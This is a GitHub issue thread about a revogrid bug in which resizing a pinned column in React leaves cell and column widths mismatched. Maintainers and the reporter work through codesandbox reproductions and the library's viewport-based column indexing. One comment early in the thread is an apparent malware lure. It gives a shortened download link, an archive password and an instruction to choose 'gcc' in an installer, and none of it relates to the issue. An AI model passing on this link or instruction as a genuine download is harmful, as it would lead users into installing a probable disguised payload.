### ISSUE TITLE
Mismatch between size of cell and column

### ISSUE THREAD

**Issue by ojaylu** [revolist/revogrid#544]
**Describe the issue**
When a pinned column is resized and the source is changed (as a state in React), the cell sizes and the column size is mismatched.

**To Reproduce**
Set a pinned column and make the columns resizable. Change the size of the pinned column, then make changes to the source to make the table rerender. 

https://github.com/user-attachments/assets/b41a66b2-9a15-4479-b939-3f8e63072912

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by m2a2x** [comment]
hi @ojaylu 
could you please reproduce this in codesandbox, it would save us some time on reproduction and will increase fix speed

you can take starting example for react from here
https://rv-grid.com/guide/react/

**Comment by ojaylu** [comment]
Sure no problem, here's an example.
https://codesandbox.io/p/sandbox/react-revogrid-start-forked-7hz86p

## Steps to recreate the bug
1. Resize the pinned column (column name: FIRST)
2. Click button (name: Cause rerender) which updates the state
3. Scroll horizontally

https://github.com/user-attachments/assets/9a5c75a3-d3e1-4b29-8fd9-1657c5accc22

**Comment by m2a2x** [comment]
Thank you
I'll check!

**Comment by m2a2x** [comment]
@ojaylu fixed

**Comment by m2a2x** [comment]
@ojaylu made you quick example 
https://codesandbox.io/p/sandbox/react-revogrid-resize-zpwtzt

**Comment by ojaylu** [comment]
I see, thanks!

Seems using just `useRef` (without onAftercolumnresize) was able to solve the problem.
https://codesandbox.io/p/sandbox/react-revogrid-resize-forked-3wrvd4

But not sure if this is intended, but index passed to `onAftercolumnresize` seems to be a bit weird. It passes index 0 for all pinned columns, whereas the first unpinned column also starts with an index of 0. The index passed doesn't seem to be consistent.

So using your example, if I change the size of any pinned column (e.g, FOURTH, which is the last column) or the first unpinned column (SECOND), it would actually be changing the dimensions of FIRST since it is the first element in the list.
https://codesandbox.io/p/sandbox/react-revogrid-resize-forked-x7jxlv


https://github.com/user-attachments/assets/7ad75e16-4a61-4bea-b7bf-16f93f0e4a72

**Comment by revolist** [comment]
Hi @ojaylu!
Thank you for pointing this out and making detailed examples.
This is expected behavior. Grid has multiple viewports depend on pinned area such as:

export type DimensionTypeRow = 'rgRow';
export type DimensionTypeCol = 'rgCol';
export type DimensionColPin = 'colPinStart' | 'colPinEnd';
export type DimensionRowPin = 'rowPinStart' | 'rowPinEnd'


usually most of the methods returns data coordinates according to viewport, to simplify work with focus connector, not the physical index

in your case you have [colPinStart', 'rgCol', 'colPinEnd']
it would be as [[0, 1, 2...], [0, 1, 2...], [0, 1, 2..]]

let me know if you need farther information or help with conversion virtual indexes to physical one.
We are going to add this to the docs.

**Comment by ojaylu** [comment]
Got it, thanks!

But going back to @m2a2x's quick example. If we change the width of SECOND (first unpinned column), or FOURTH (first pinned column to the end of the table), it will actually be changing the size of the first element in the data set, which is FIRST in this case.
https://codesandbox.io/p/sandbox/react-revogrid-resize-forked-mw5pkl

https://github.com/user-attachments/assets/254a76f4-6d80-4cda-8261-0dd4dab7261d

**Comment by m2a2x** [comment]
Hello @ojaylu! 👋

Thanks for your patience, and I apologize for any confusion earlier. I appreciate your understanding as I clarify the concept!

You're absolutely right about changing the width of the SECOND (the first unpinned column) or the FOURTH (the first pinned column) actually affecting the size of the FIRST element in the data set. 

In my previous example, I oversimplified the concept to illustrate different ways to update your column data source. I’ve now updated the example to better demonstrate how it can be done more accurately. You can check it out here: [Updated Example](https://codesandbox.io/p/sandbox/react-revogrid-resize-forked-ttr47j?file=%2Fsrc%2FApp.tsx%3A9%2C76).

We've also work with the team at @revolist to enhance our documentation on [viewports](https://rv-grid.com/guide/viewports.html). While I recommend to explore that, I wouldn't want to overwhelm you while you're still getting familiar with the grid.

If you have any more questions or need further clarification, feel free to ask!

Best,  
Maks
